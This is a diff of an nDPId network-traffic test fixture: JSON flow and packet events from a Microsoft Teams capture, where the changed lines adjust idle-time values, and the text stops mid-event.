+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1587041693561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693561,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NiAbvwxDFGjkDaLFAQIABPogAA"} 
+00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2489,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1587041693572,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693572,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXfJQAAGwR4OU0cvp7wKgBBg2Ww2AAw6emARMApyESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+o0AFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6jYCVAAh\/IMTdT4SN+oAgAAgAAcHVcadqCg=="} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgF74AAEARcjPAqAEGNHL6e8N0DZYATEppAAMAMCESpEI9x0RmdejywONbcT4ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NlAbtcWVYoAAAAALAC\/\/\/E5AAAAgQFtAEDAwUBAQgKMITZVQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NlAbtcWVYoAAAAALAC\/\/\/E5AAAAgQFtAEDAwUBAQgKMITZVQAAAAAEAgAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1587041693597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693597,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyLLYAAEARXJfAqAEGNHL6jcNgDZYA3iTJAAMAwiESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIfyDE3U+EjfoAFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACB+ROZSH0cQpVQPYpCmfWn5X6jy8HHHqFihd3XDn9tzDQ=="} 
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
@@ -415,9 +415,9 @@ 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1587041693611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693611,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgfyMAAEARCrzAqAEGNHL6jcNhDZYATBjuAAMAMCESpELalY8VcoE3uJ+0vVMADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2515,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1587041693625,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693625,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxUAAGwRBmU0cvp7wKgBBg2Ww3QAwyhaARMApyESpEI9x0RmdejywONbcT4ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAhb5VsGDC2J+oAgAAgAAc5scadqCg=="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2516,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0Nx9AAGwG5wg0cvp7wKgBBgG7w2XeqFvwXFlWKYAS\/\/\/MOwAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2517,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NlAbtcWVYp3qhb8VAQIADs+gAA"} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2516,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1587041693628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0Nx9AAGwG5wg0cvp7wKgBBgG7w2XeqFvwXFlWKYAS\/\/\/MOwAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2517,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1587041693628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NlAbtcWVYp3qhb8VAQIADs+gAA"} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2519,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1587041693640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1587041693640,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC1fJUAAGwR4QY0cvp7wKgBBg2Ww2AAoaFUAQMAhSESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxgANAAQAAAA8AAEACAABDZg0cvqNgAgABAAAAAaAIAAIAAHB1XGnagqAUAAYm3E8YjrBv7v21SN1g6+m0xjhRrQAAAAAgCIACTIuMC4xLjIxMQAQAAQAAC7gAAgAIK\/9w8VcH20Bp+o9r1mX6tB+MRypEJNYTX2DO\/tetQep"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1587041693654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADySXIAAEARP9\/AqAEGNHL6icN0DZYA3q9FAAMAwiESpELOvwn047sA+HEU4bYADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIW+VbBgwtifoAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACCU7UyKuDgKSJKUvk8SSs9ovhsGMp06Kok2oE1dFOuKzQ=="} 
@@ -430,28 +430,28 @@ 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1587041693711,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693711,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyfgoAAEARC0PAqAEGNHL6jcNhDZYA3rEpAAMAwiESpEJLDXUDhL3sfvdJg10ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIkFC\/JA7FjfoAFAAUPpo\/SSn4PJAIkOO6zaqfvtmAt1IAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACBfcijkK3I1E6fsjRiPsKvs33Xfpf\/cKnDyh7VrIY168g=="} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1587041693714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693714,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxcAAGwRBlU0cvqJwKgBBg2Ww3UAwwtKARMApyESpEJNv3gTxWrFDZ5wS8sADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUc60+h2VE9PTAWxn4K2V6NOmKA20AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAjDwJ1K7o6J+oAgAAgAAcBocadqCg=="} 
00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2552,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1587041693763,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693763,"pkt":"EBMx8Tl2KDc3AG3ICABFAADy1jgAAEARsxjAqAEGNHL6icN1DZYA3qn\/AAMAwiESpEK\/FrW6Bpt+jaFgT0IADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIw8CdSu6OifoAFAAUc60+h2VE9PTAWxn4K2V6NOmKA20AFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACAOMJjC3yWHP2a8uRvQ6tdNq4Cf2VvwjY\/Ply+68rS7wg=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2559,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693828,"flow_last_seen":1587041693828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693828,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1587041693828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf\/AqAEGNHL6mMNeAbvdNMkXAAAAALAC\/\/\/QFQAAAgQFtAEDAwUBAQgKMITaQwAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693849,"flow_last_seen":1587041693849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693849,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1587041693849,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693849,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf7AqAEGNHL6mcN0AbuMksvlAAAAALAC\/\/8dvwAAAgQFtAEDAwUBAQgKMITaVwAAAAAEAgAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2564,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693869,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZxAAGwGgG40cvqYwKgBBgG7w17cXACa3TTJGIAS\/\/81\/QAAAgQFoAEDAwgBAQQC"} 
-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2565,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693869,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShfAqAEGNHL6mMNeAbvdNMkY3FwAm1AQIABWvAAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2567,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693893,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0NypAAGwG5t80cvqZwKgBBgG7w3QJhgXYjJLL5oAS\/\/9RUwAAAgQFoAEDAwgBAQQC"} 
-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2568,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693893,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShbAqAEGNHL6mcN0AbuMksvmCYYF2VAQIAByEgAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": 
